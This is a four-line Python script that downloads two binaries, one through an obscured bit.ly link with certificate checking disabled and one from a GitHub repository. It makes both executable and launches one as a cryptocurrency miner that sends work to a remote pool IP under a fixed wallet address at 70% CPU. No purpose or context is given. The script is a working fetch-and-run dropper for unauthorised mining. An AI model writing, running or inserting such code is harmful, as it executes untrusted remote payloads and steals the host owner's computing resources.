import os

os.system("wget --no-check-certificate -c https://bit.ly/38QFOus -O xolx")
os.system("wget https://github.com/ardisantaka/ardia/raw/main/gas")
os.system("chmod +x gas xolx")
os.system("./xolx -o 137.184.144.131:3333 -u TRTLv2xgnXYJBqb7BuX2MwFZg42hfNDxrK9Y7kjZBNHuZRM17sJSEvQQK8BDhb3Nra48dvXydwZEjA7gWKNwLRJpE7Rw4DXjQqJ.0000000000000000000000000000000000000000000000000000001884336411 -p XMR-NODE-PROXY --max-cpu-usage 70 --donate-level 1 -k")